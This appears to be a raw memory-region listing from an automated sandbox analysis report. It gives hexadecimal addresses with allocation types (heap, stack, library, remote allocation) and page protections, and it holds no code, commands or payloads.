trusted library allocation
|
page read and write
|
||
1B042780000
|
trusted library allocation
|
page read and write
|
||
384B3FE000
|
unkown
|
page readonly
|
||
7FFAAC932000
|
trusted library allocation
|
page read and write
|
||
2927F437000
|
heap
|
page read and write
|
||
B63000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC130000
|
trusted library allocation
|
page read and write
|
||
1B042623000
|
heap
|
page read and write
|
||
7FFAAC836000
|
trusted library allocation
|
page read and write
|
||
1BCAB511000
|
heap
|
page read and write
|
||
29262160000
|
heap
|
page read and write
|
||
7FFAAC88B000
|
trusted library allocation
|
page read and write
|
||
7FFAACB48000
|
trusted library allocation
|
page read and write
|
||
1A4B2BBA000
|
trusted library allocation
|
page read and write
|
||
142DB24D000
|
heap
|
page read and write
|
||
7FFAAC954000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2C0000
|
trusted library allocation
|
page read and write
|
||
9EB512D000
|
stack
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8FB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC938000
|
trusted library allocation
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
7FFAAC846000
|
trusted library allocation
|
page read and write
|
||
1BCA8B43000
|
heap
|
page read and write
|
||
7FFAAC8F9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3AA000
|
trusted library allocation
|
page read and write
|
||
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
9D0000
|
heap
|
page execute and read and write
|
||
1B044190000
|
heap
|
page read and write
|
||
7FFAAC85A000
|
trusted library allocation
|
page read and write
|
||
23D06702000
|
heap
|
page read and write
|
||
23D06F7C000
|
heap
|
page read and write
|
||
7FFAAC938000
|
trusted library allocation
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAAC83F000
|
trusted library allocation
|
page read and write
|
||
1B054C39000
|
trusted library allocation
|
page read and write
|
||
7FFAAC132000
|
trusted library allocation
|
page read and write
|
||
7FFAAC544000
|
trusted library allocation
|
page read and write
|
||
1A4CDA44000
|
heap
|
page read and write
|
||
4041000
|
trusted library allocation
|
page read and write
|
||
23D076A8000
|
heap
|
page read and write
|
||
51CD000
|
stack
|
page read and write
|
||
7FFAAC386000
|
trusted library allocation
|
page read and write
|
||
D4B000
|
stack
|
page read and write
|
||
7FFAAC722000
|
trusted library allocation
|
page read and write
|
||
1B0441B3000
|
heap
|
page read and write
|
||
7FFAAC2C4000
|
trusted library allocation
|
page read and write
|
||
384B8FB000
|
stack
|
page read and write
|
||
6EE06000
|
unkown
|
page readonly
|
||
7FFAAC1D6000
|
trusted library allocation
|
page read and write
|
||
29262445000
|
heap
|
page read and write
|
||
16EB3350000
|
trusted library section
|
page read and write
|
||
7FFAAC892000
|
trusted library allocation
|
page read and write
|
||
7FFAAC615000
|
trusted library allocation
|
page read and write
|
||
23D06F7A000
|
heap
|
page read and write
|
||
23D06F57000
|
heap
|
page read and write
|
||
A36ADFD000
|
stack
|
page read and write
|
||
7FF7FE548000
|
unkown
|
page readonly
|
||
1DDEEF70000
|
unkown
|
page read and write
|
||
7FFAAC337000
|
trusted library allocation
|
page read and write
|
||
66C000
|
stack
|
page read and write
|
||
142D5C9D000
|
heap
|
page read and write
|
||
7FFAAC133000
|
trusted library allocation
|
page execute and read and write
|
||
384B2FE000
|
stack
|
page read and write
|
||
7FFAAC2CB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC536000
|
trusted library allocation
|
page read and write
|
||
142D5B90000
|
trusted library allocation
|
page read and write
|
||
7FFAAC57B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC793000
|
trusted library allocation
|
page read and write
|
||
7FFAAC974000
|
trusted library allocation
|
page read and write
|
||
7FFAAC92B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC615000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8BA000
|
trusted library allocation
|
page read and write
|
||
7FFAAC574000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7C2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC15B000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC382000
|
trusted library allocation
|
page read and write
|
||
7FFAAC892000
|
trusted library allocation
|
page read and write
|
||
7FFAAC120000
|
trusted library allocation
|
page read and write
|
||
7FFAACB0B000
|
trusted library allocation
|
page read and write
|
||
16E98F62000
|
unkown
|
page readonly
|
||
7FFAAC46E000
|
trusted library allocation
|
page read and write
|
||
B0C68F8000
|
stack
|
page read and write
|
||
1BCA01C8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC795000
|
trusted library allocation
|
page read and write
|
||
142DB100000
|
trusted library allocation
|
page read and write
|
||
384B4FC000
|
stack
|
page read and write
|
||
142DB2FD000
|
heap
|
page read and write
|
||
1F28A302000
|
heap
|
page read and write
|
||
9C562FD000
|
stack
|
page read and write
|
||
7FFAACA44000
|
trusted library allocation
|
page read and write
|
||
1DDEEF40000
|
heap
|
page read and write
|
||
7FFAAC92B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC909000
|
trusted library allocation
|
page read and write
|
||
7FFAACA30000
|
trusted library allocation
|
page read and write
|
||
2109A570000
|
heap
|
page read and write
|
||
142D6502000
|
heap
|
page read and write
|
||
7FFAAC7E3000
|
trusted library allocation
|
page read and write
|
||
142D5D13000
|
heap
|
page read and write
|
||
7FFAAC17C000
|
trusted library allocation
|
page execute and read and write
|
||
29A56F3000
|
stack
|
page read and write
|
||
1F28A300000
|
heap
|
page read and write
|
||
7FFAAC73B000
|
trusted library allocation
|
page read and write
|
||
513D000
|
stack
|
page read and write
|
||
7FFAAC120000
|
trusted library allocation
|
page read and write
|
||
9EB547F000
|
stack
|
page read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
23D06F8B000
|
heap
|
page read and write
|
||
23D07683000
|
heap
|
page read and write
|
||
7FFAAC350000
|
trusted library allocation
|
page read and write
|
||
16E991CD000
|
heap
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
7FFAAC53A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
7FFAAC544000
|
trusted library allocation
|
page read and write
|
||
142DB254000
|
heap
|
page read and write
|
||
2ADE000
|
stack
|
page read and write
|
||
29262150000
|
heap
|
page read and write
|
||
7FFAACB4A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC401000
|
trusted library allocation
|
page read and write
|
||
7FFAAC938000
|
trusted library allocation
|
page read and write
|
||
7FFAAC48C000
|
trusted library allocation
|
page read and write
|
||
6770000
|
heap
|
page read and write
|
||
6760000
|
trusted library allocation
|
page read and write
|
||
7FFAAC648000
|
trusted library allocation
|
page read and write
|
||
7FFAAC497000
|
trusted library allocation
|
page read and write
|
||
23D06D80000
|
remote allocation
|
page read and write
|
||
7FFAACB44000
|
trusted library allocation
|
page read and write
|
||
7FFAAC154000
|
trusted library allocation
|
page read and write
|
||
7FFAACA95000
|
trusted library allocation
|
page read and write
|
||
7FFAAC612000
|
trusted library allocation
|
page read and write
|
||
767000
|
trusted library allocation
|
page execute and read and write
|
||
1B042620000
|
heap
|
page read and write
|
||
7FFAAC93B000
|
trusted library allocation
|
page read and write
|
||
29264239000
|
trusted library allocation
|
page read and write
|
||
586E000
|
stack
|
page read and write
|
||
7FFAACA89000
|
trusted library allocation
|
page read and write
|
||
7FFAAC319000
|
trusted library allocation
|
page read and write
|
||
7FFAAC34F000
|
trusted library allocation
|
page read and write
|
||
142DB1F0000
|
trusted library allocation
|
page read and write
|
||
5B8E000
|
stack
|
page read and write
|
||
7FFAAC7F3000
|
trusted library allocation
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
1B068580000
|
trusted library allocation
|
page read and write
|
||
23D07704000
|
heap
|
page read and write
|
||
16E994D0000
|
trusted library section
|
page readonly
|
||
1BC8E820000
|
trusted library allocation
|
page read and write
|
||
1B05C890000
|
heap
|
page read and write
|
||
7FFAAC767000
|
trusted library allocation
|
page read and write
|
||
7FFAACB3E000
|
trusted library allocation
|
page read and write
|
||
23D06F5A000
|
heap
|
page read and write
|
||
384C5FE000
|
stack
|
page read and write
|
||
7FFAAC43C000
|
trusted library allocation
|
page read and write
|
||
1A4CC4BC000
|
heap
|
page read and write
|
||
E10000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F5A000
|
heap
|
page read and write
|
||
23D07682000
|
heap
|
page read and write
|
||
6EED000
|
stack
|
page read and write
|
||
7FFAAC14D000
|
trusted library allocation
|
page execute and read and write
|
||
D00000
|
heap
|
page read and write
|
||
23D066F8000
|
heap
|
page read and write
|
||
9C563FC000
|
stack
|
page read and write
|
||
7FFAACB27000
|
trusted library allocation
|
page read and write
|
||
7FFAAC84A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC574000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC882000
|
trusted library allocation
|
page read and write
|
||
7FFAAC726000
|
trusted library allocation
|
page read and write
|
||
1A4B0B33000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7DB000
|
trusted library allocation
|
page read and write
|
||
42D6DFA000
|
stack
|
page read and write
|
||
16EB4760000
|
heap
|
page read and write
|
||
7FFAAC43A000
|
trusted library allocation
|
page read and write
|
||
140043000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC7DB000
|
trusted library allocation
|
page read and write
|
||
7FFAACAF5000
|
trusted library allocation
|
page read and write
|
||
16EB35F0000
|
heap
|
page read and write
|
||
42D63FE000
|
stack
|
page read and write
|
||
7FFAACB20000
|
trusted library allocation
|
page read and write
|
||
7FFAACA2F000
|
trusted library allocation
|
page read and write
|
||
9C3000
|
trusted library allocation
|
page read and write
|
||
1932CE60000
|
heap
|
page read and write
|
||
142DC000000
|
heap
|
page read and write
|
||
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
23D06F7D000
|
heap
|
page read and write
|
||
7FFAAC6F2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9DF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC144000
|
trusted library allocation
|
page read and write
|
||
7FFAAC752000
|
trusted library allocation
|
page read and write
|
||
16E99120000
|
heap
|
page read and write
|
||
16EAAC91000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC9E8000
|
trusted library allocation
|
page read and write
|
||
142D5C6F000
|
heap
|
page read and write
|
||
7FFAAC722000
|
trusted library allocation
|
page read and write
|
||
5C55000
|
heap
|
page read and write
|
||
7FFAAC734000
|
trusted library allocation
|
page read and write
|
||
142DB140000
|
direct allocation
|
page execute and read and write
|
||
DB0000
|
heap
|
page read and write
|
||
72C4000
|
trusted library allocation
|
page read and write
|
||
142DB460000
|
trusted library allocation
|
page read and write
|
||
7FFAAC138000
|
trusted library allocation
|
page read and write
|
||
7FFAAC73B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC87E000
|
trusted library allocation
|
page read and write
|
||
64BE000
|
stack
|
page read and write
|
||
7FFAAC43C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
7FFAACAF3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8F7000
|
trusted library allocation
|
page read and write
|
||
16E994F5000
|
heap
|
page read and write
|
||
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
23D06F29000
|
heap
|
page read and write
|
||
7FF4ECF70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC3B3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7ED000
|
trusted library allocation
|
page read and write
|
||
7FFAACBA0000
|
trusted library allocation
|
page execute and read and write
|
||
23D076D4000
|
heap
|
page read and write
|
||
1A4B0BF0000
|
heap
|
page read and write
|
||
7FFAAC4EC000
|
trusted library allocation
|
page read and write
|
||
23D0760E000
|
heap
|
page read and write
|
||
7FFAAC7B5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC922000
|
trusted library allocation
|
page read and write
|
||
7FFAACB3C000
|
trusted library allocation
|
page read and write
|
||
42D6AFE000
|
stack
|
page read and write
|
||
7FFAAC7C2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC45E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
7FFAAC90E000
|
trusted library allocation
|
page read and write
|
||
8A8000
|
heap
|
page read and write
|
||
1A4B0BA5000
|
heap
|
page read and write
|
||
142DB140000
|
trusted library allocation
|
page read and write
|
||
23D06F74000
|
heap
|
page read and write
|
||
BA8DBFF000
|
stack
|
page read and write
|
||
7FFAAC8D8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC870000
|
trusted library allocation
|
page read and write
|
||
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
29262180000
|
heap
|
page read and write
|
||
1BC9063E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC384000
|
trusted library allocation
|
page read and write
|
||
B79000
|
stack
|
page read and write
|
||
98C01FC000
|
stack
|
page read and write
|
||
15A6000
|
trusted library allocation
|
page execute and read and write
|
||
142D5CBC000
|
heap
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
1B0441C0000
|
heap
|
page read and write
|
||
7FFAAC4BA000
|
trusted library allocation
|
page read and write
|
||
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
16EB4D62000
|
heap
|
page read and write
|
||
7FFAAC695000
|
trusted library allocation
|
page read and write
|
||
7FFAAC70C000
|
trusted library allocation
|
page read and write
|
||
1A4B2707000
|
trusted library allocation
|
page read and write
|
||
A36A5FD000
|
stack
|
page read and write
|
||
BA8D7F0000
|
stack
|
page read and write
|
||
7FFAAC386000
|
trusted library allocation
|
page read and write
|
||
1BCA8B40000
|
heap
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
7FFAAC15D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACB09000
|
trusted library allocation
|
page read and write
|
||
23D06673000
|
heap
|
page read and write
|
||
7FFAAC819000
|
trusted library allocation
|
page read and write
|
||
23D06638000
|
heap
|
page read and write
|
||
142DB780000
|
trusted library allocation
|
page read and write
|
||
7FFAAC320000
|
trusted library allocation
|
page read and write
|
||
2B10000
|
heap
|
page read and write
|
||
1A4B09BE000
|
heap
|
page read and write
|
||
23D066A1000
|
heap
|
page read and write
|
||
7FFAAC7B9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3AC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC48E000
|
trusted library allocation
|
page read and write
|
||
29264394000
|
trusted library allocation
|
page read and write
|
||
7FFAAC51C000
|
trusted library allocation
|
page read and write
|
||
D45000
|
heap
|
page read and write
|
||
7FFAACB4D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC79A000
|
trusted library allocation
|
page read and write
|
||
1A4B08A0000
|
heap
|
page read and write
|
||
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
1B05C8DC000
|
heap
|
page read and write
|
||
142D5CB2000
|
heap
|
page read and write
|
||
292621FF000
|
heap
|
page read and write
|
||
1BC8E73B000
|
heap
|
page read and write
|
||
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
142E000
|
stack
|
page read and write
|
||
1B042760000
|
trusted library allocation
|
page read and write
|
||
7FFAAC762000
|
trusted library allocation
|
page read and write
|
||
1262000
|
heap
|
page read and write
|
||
543D000
|
stack
|
page read and write
|
||
12AB000
|
heap
|
page read and write
|
||
1A4CD9E1000
|
heap
|
page read and write
|
||
22EE000
|
stack
|
page read and write
|
||
23D06F5F000
|
heap
|
page read and write
|
||
1F289E3C000
|
heap
|
page read and write
|
||
2927C790000
|
heap
|
page read and write
|
||
7FFAAC53A000
|
trusted library allocation
|
page read and write
|
||
23D076D2000
|
heap
|
page read and write
|
||
7FFB1D560000
|
unkown
|
page read and write
|
||
45ED000
|
stack
|
page read and write
|
||
142DB270000
|
trusted library allocation
|
page read and write
|
||
23D07710000
|
heap
|
page read and write
|
||
7FFAAC388000
|
trusted library allocation
|
page read and write
|
||
7FFAAC378000
|
trusted library allocation
|
page read and write
|
||
1BCAB505000
|
heap
|
page read and write
|
||
17D46E60000
|
heap
|
page read and write
|
||
23D0673B000
|
heap
|
page read and write
|
||
1BCAB503000
|
heap
|
page read and write
|
||
1A4B0BB0000
|
heap
|
page read and write
|
||
23D07702000
|
heap
|
page read and write
|
||
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
1F289E02000
|
unkown
|
page read and write
|
||
23D06F82000
|
heap
|
page read and write
|
||
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
29273DC1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6F4000
|
trusted library allocation
|
page read and write
|
||
23D07615000
|
heap
|
page read and write
|
||
7FFAAC3E2000
|
trusted library allocation
|
page read and write
|
||
7FFAACA2F000
|
trusted library allocation
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
7FFAAC822000
|
trusted library allocation
|
page read and write
|
||
7FFAAC72B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC886000
|
trusted library allocation
|
page read and write
|
||
23D06F80000
|
heap
|
page read and write
|
||
7FFAAC7F5000
|
trusted library allocation
|
page read and write
|
||
7FFAAC140000
|
trusted library allocation
|
page read and write
|
||
7FFAAC795000
|
trusted library allocation
|
page read and write
|
||
6A6D000
|
stack
|
page read and write
|
||
23D06F6A000
|
heap
|
page read and write
|
||
5FAE000
|
stack
|
page read and write
|
||
23D07702000
|
heap
|
page read and write
|
||
1BC905D6000
|
trusted library allocation
|
page read and write
|
||
142D5CB2000
|
heap
|
page read and write
|
||
23D06F7E000
|
heap
|
page read and write
|
||
384B0F7000
|
stack
|
page read and write
|
||
1B042700000
|
heap
|
page read and write
|
||
7FFAAC858000
|
trusted library allocation
|
page read and write
|
||
B50000
|
trusted library allocation
|
page read and write
|
||
7FFAAC769000
|
trusted library allocation
|
page read and write
|
||
7FFAAC58A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8D8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8D6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4AD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A9000
|
trusted library allocation
|
page read and write
|
||
23D06D80000
|
remote allocation
|
page read and write
|
||
23D06F72000
|
heap
|
page read and write
|
||
7FFAAC4A9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC310000
|
trusted library allocation
|
page read and write
|
||
1BC8E690000
|
heap
|
page read and write
|
||
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
6AEF000
|
stack
|
page read and write
|
||
142D651A000
|
heap
|
page read and write
|
||
23D07702000
|
heap
|
page read and write
|
||
7FFAAC4F8000
|
trusted library allocation
|
page read and write
|
||
4BEE000
|
stack
|
page read and write
|
||
7FFAAC872000
|
trusted library allocation
|
page read and write
|
||
7FFAAC876000
|
trusted library allocation
|
page read and write
|
||
7FFAAC355000
|
trusted library allocation
|
page read and write
|
||
7FFAACB42000
|
trusted library allocation
|
page read and write
|
||
7FFAAC55B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC87E000
|
trusted library allocation
|
page read and write
|
||
142DB111000
|
trusted library allocation
|
page read and write
|
||
26E36A48000
|
heap
|
page read and write
|
||
1473000
|
trusted library allocation
|
page execute and read and write
|
||
5C7C000
|
heap
|
page read and write
|
||
7FFAACA1B000
|
trusted library allocation
|
page read and write
|
||
23D076C3000
|
heap
|
page read and write
|
||
7FFAACB4A000
|
trusted library allocation
|
page read and write
|
||
59AE000
|
stack
|
page read and write
|
||
7FFAAC64C000
|
trusted library allocation
|
page read and write
|
||
A36A3FE000
|
stack
|
page read and write
|
||
28E0000
|
heap
|
page read and write
|
||
7FFAAC765000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8DB000
|
trusted library allocation
|
page read and write
|
||
16E994F0000
|
heap
|
page read and write
|
||
7FFAAC561000
|
trusted library allocation
|
page read and write
|
||
2927F425000
|
heap
|
page read and write
|
||
142D5C3F000
|
heap
|
page read and write
|
||
7FFAAC4A7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC78B000
|
trusted library allocation
|
page read and write
|
||
7FFAACAF3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC744000
|
trusted library allocation
|
page read and write
|
||
384C2FE000
|
stack
|
page read and write
|
||
1BC8E77A000
|
heap
|
page read and write
|
||
23D06DC0000
|
remote allocation
|
page execute and read and write
|
||
142DB211000
|
heap
|
page read and write
|
||
7FFAAC926000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8BA000
|
trusted library allocation
|
page read and write
|
||
23D07674000
|
heap
|
page read and write
|
||
1480000
|
trusted library allocation
|
page read and write
|
||
7FFAACA36000
|
trusted library allocation
|
page read and write
|
||
7FFAAC14D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC66B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC408000
|
trusted library allocation
|
page read and write
|
||
7FFAAC842000
|
trusted library allocation
|
page read and write
|
||
29263CA5000
|
heap
|
page read and write
|
||
1B054239000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8AD000
|
trusted library allocation
|
page read and write
|
||
2109A510000
|
heap
|
page read and write
|
||
B79000
|
trusted library allocation
|
page read and write
|
||
7FFAAC1E6000
|
trusted library allocation
|
page read and write
|
||
1F28A300000
|
heap
|
page read and write
|
||
142DB400000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC37D000
|
trusted library allocation
|
page read and write
|
||
23D06F77000
|
heap
|
page read and write
|
||
23D06F29000
|
heap
|
page read and write
|
||
7FFAAC13D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC8A9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC93D000
|
trusted library allocation
|
page read and write
|
||
23D06560000
|
heap
|
page read and write
|
||
7FFAAC8D6000
|
trusted library allocation
|
page read and write
|
||
16EAACA1000
|
trusted library allocation
|
page read and write
|
||
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
165C000
|
stack
|
page read and write
|
||
2109C450000
|
remote allocation
|
page read and write
|
||
5BEF000
|
stack
|
page read and write
|
||
23D06F4D000
|
heap
|
page read and write
|
||
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC657000
|
trusted library allocation
|
page read and write
|
||
1B0425EC000
|
heap
|
page read and write
|
||
1DDEEFC9000
|
direct allocation
|
page execute and read and write
|
||
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
1A4B0800000
|
unkown
|
page readonly
|
||
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
1F28A213000
|
heap
|
page read and write
|
||
7FFAAC3E8000
|
trusted library allocation
|
page read and write
|
||
682000
|
heap
|
page read and write
|
||
23D06F7F000
|
heap
|
page read and write
|
||
7FFAAC4E2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC905000
|
trusted library allocation
|
page read and write
|
||
4C8F000
|
stack
|
page read and write
|
||
1A4B27EA000
|
trusted library allocation
|
page read and write
|
||
7FFAACA38000
|
trusted library allocation
|
page read and write
|
||
7FFAAC72F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC384000
|
trusted library allocation
|
page read and write
|
||
142DB2FA000
|
heap
|
page read and write
|
||
20B6A660000
|
heap
|
page read and write
|
||
7FFAACB34000
|
trusted library allocation
|
page read and write
|
||
A36ABFD000
|
stack
|
page read and write
|
||
1A4B2B1D000
|
trusted library allocation
|
page read and write
|
||
B0C72FE000
|
stack
|
page read and write
|
||
7FFAAC5EE000
|
trusted library allocation
|
page read and write
|
||
384B6F9000
|
stack
|
page read and write
|
||
2109A396000
|
heap
|
page read and write
|
||
7FFB1D560000
|
unkown
|
page read and write
|
||
1BCA01C1000
|
trusted library allocation
|
page read and write
|
||
16E99252000
|
heap
|
page read and write
|
||
7FFAAC769000
|
trusted library allocation
|
page read and write
|
||
7FFAAC533000
|
trusted library allocation
|
page read and write
|
||
98C07FD000
|
stack
|
page read and write
|
||
142D5C5B000
|
heap
|
page read and write
|
||
6EE0D000
|
unkown
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
7FFAAC45E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC907000
|
trusted library allocation
|
page read and write
|
||
7FFAAC695000
|
trusted library allocation
|
page read and write
|
||
17D46D70000
|
heap
|
page read and write
|
||
7FFAAC8DF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC648000
|
trusted library allocation
|
page read and write
|
||
7FFAAC53F000
|
trusted library allocation
|
page read and write
|
||
16EB3460000
|
heap
|
page read and write
|
||
625000
|
heap
|
page read and write
|
||
23D074A9000
|
direct allocation
|
page execute and read and write
|
||
7FFAAC46B000
|
trusted library allocation
|
page read and write
|
||
1A4B26C1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
7FFAAC53C000
|
trusted library allocation
|
page read and write
|
||
384D1FE000
|
unkown
|
page readonly
|
||
1BC8E6F0000
|
trusted library allocation
|
page read and write
|
||
1BC90780000
|
trusted library allocation
|
page read and write
|
||
23D076C8000
|
heap
|
page read and write
|
||
7FFAAC546000
|
trusted library allocation
|
page read and write
|
||
3AF5000
|
trusted library allocation
|
page read and write
|
||
7FFAACB3E000
|
trusted library allocation
|
page read and write
|
||
1A4B09BC000
|
heap
|
page read and write
|
||
1402C8000
|
remote allocation
|
page execute and read and write
|
||
42D69FE000
|
stack
|
page read and write
|
||
7FFAAC493000
|
trusted library allocation
|
page read and write
|
||
7FFAAC561000
|
trusted library allocation
|
page read and write
|
||
7FFAAC762000
|
trusted library allocation
|
page read and write
|
||
7FFAAC362000
|
trusted library allocation
|
page read and write
|
||
1A4B097B000
|
heap
|
page read and write
|
||
23D06F07000
|
heap
|
page read and write
|
||
7FFAAC8C3000
|
trusted library allocation
|
page read and write
|
||
596E000
|
stack
|
page read and write
|
||
7FFAAC9DF000
|
trusted library allocation
|
page read and write
|
||
142D5D06000
|
heap
|
page read and write
|
||
1BCA8B60000
|
heap
|
page read and write
|
||
7FFAACA85000
|
trusted library allocation
|
page read and write
|
||
7FFAAC74C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC889000
|
trusted library allocation
|
page read and write
|
||
20B6A760000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC3A0000
|
trusted library allocation
|
page read and write
|
||
1B042790000
|
trusted library allocation
|
page read and write
|
||
2109BD20000
|
heap
|
page read and write
|
||
C5AAFD000
|
stack
|
page read and write
|
||
29A5DFF000
|
stack
|
page read and write
|
||
23D06F74000
|
heap
|
page read and write
|
||
7FFB23AB0000
|
unkown
|
page read and write
|
||
2109A3D9000
|
heap
|
page read and write
|
||
7FFAAC928000
|
trusted library allocation
|
page read and write
|
||
142DB4B0000
|
remote allocation
|
page read and write
|
||
2927BDE0000
|
trusted library allocation
|
page read and write
|
||
1BC90530000
|
trusted library allocation
|
page read and write
|
||
1677000
|
heap
|
page read and write
|
||
7FFAAC340000
|
trusted library allocation
|
page read and write
|
||
2A40000
|
trusted library allocation
|
page read and write
|
||
7FFAAC48C000
|
trusted library allocation
|
page read and write
|
||
7FFB1D565000
|
unkown
|
page readonly
|
||
7FFAAC4EC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC89D000
|
trusted library allocation
|
page read and write
|
||
61EE000
|
stack
|
page read and write
|
||
7FFAACAB4000
|
trusted library allocation
|
page read and write
|
||
23D0665E000
|
heap
|
page read and write
|
||
7FFAAC90B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC858000
|
trusted library allocation
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
29262228000
|
heap
|
page read and write
|
||
7FFAAC82F000
|
trusted library allocation
|
page read and write
|
||
20B6A7DC000
|
heap
|
page read and write
|
||
1BCAA3F0000
|
heap
|
page read and write
|
||
384B1FE000
|
unkown
|
page readonly
|
||
7FFAAC8F9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC30C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
There are 2381 hidden memdumps, click here to show them.